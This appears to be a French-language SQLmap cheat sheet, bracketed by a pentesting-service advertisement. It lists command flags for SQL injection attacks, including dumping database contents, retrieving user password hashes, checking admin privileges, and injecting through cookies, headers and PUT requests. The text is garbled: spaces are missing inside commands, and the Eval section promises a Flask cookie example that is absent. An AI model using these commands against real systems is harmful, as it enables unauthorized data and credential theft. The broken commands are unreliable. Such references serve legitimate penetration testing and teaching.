Configuration instantanément disponible pour l'évaluation des vulnérabilités et les tests de pénétration. Lancez un pentest complet de n'importe où avec plus de 20 outils et fonctionnalités allant de la reconnaissance au reporting. Nous ne remplaçons pas les pentesteurs - nous développons des outils personnalisés, des modules de détection et d'exploitation pour leur permettre de gagner du temps pour creuser plus profondément, ouvrir des shells et s'amuser.
Arguments de base pour SQLmap
Générique
-u"<URL>"-p"<PARAM TO TEST>"--user-agent=SQLMAP--random-agent--threads=10--risk=3#MAX--level=5#MAX--dbms="<KNOWN DB TECH>"--os="<OS>"--technique="UB"#Use only techniques UNION and BLIND in that order (default "BEUSTQ")--batch#Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers--auth-type="<AUTH>"#HTTP authentication type (Basic, Digest, NTLM or PKI)--auth-cred="<AUTH>"#HTTP authentication credentials (name:password)--proxy=http://127.0.0.1:8080--union-char"GsFRts2"#Help sqlmap identify union SQLi techniques with a weird union char
Récupérer des informations
Interne
--current-user#Get current user--is-dba#Check if current user is Admin--hostname#Get hostname--users#Get usernames od DB--passwords#Get passwords of users in DB--privileges#Get privileges
Données de la base de données
--all#Retrieve everything--dump#Dump DBMS database table entries--dbs#Names of the available databases--tables#Tables of a database ( -D <DB NAME> )--columns#Columns of a table ( -D <DB NAME> -T <TABLE NAME> )-D<DBNAME>-T<TABLENAME>-C<COLUMNNAME>#Dump column
Injections dans les en-têtes et autres méthodes HTTP
#Inside cookiesqlmap-u"http://example.com"--cookie"mycookies=*"#Inside some headersqlmap-u"http://example.com"--headers="x-forwarded-for:127.0.0.1*"sqlmap-u"http://example.com"--headers="referer:*"#PUT Methodsqlmap--method=PUT-u"http://example.com"--headers="referer:*"#The injection is located at the '*'
Indiquer la chaîne lorsque l'injection est réussie
--string="string_showed_when_TRUE"
Eval
Sqlmap permet d'utiliser -e ou --eval pour traiter chaque charge utile avant de l'envoyer avec un oneliner python. Cela facilite et accélère le traitement personnalisé de la charge utile avant de l'envoyer. Dans l'exemple suivant, la session cookie flaskest signée par flask avec le secret connu avant de l'envoyer:
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap-rr.txt-pid--not-stringridiculous--batch
Altérer
Rappelez-vous que vous pouvez créer votre propre altérer en python et c'est très simple. Vous pouvez trouver un exemple d'altérer dans la page d'injection de second ordre ici.
--tamper=name_of_the_tamper#In kali you can see all the tampers in /usr/share/sqlmap/tamper
Configuration instantanée disponible pour l'évaluation des vulnérabilités et les tests de pénétration. Exécutez un pentest complet de n'importe où avec plus de 20 outils et fonctionnalités allant de la reconnaissance au reporting. Nous ne remplaçons pas les pentesteurs - nous développons des outils personnalisés, des modules de détection et d'exploitation pour leur donner du temps pour creuser plus profondément, ouvrir des shells et s'amuser.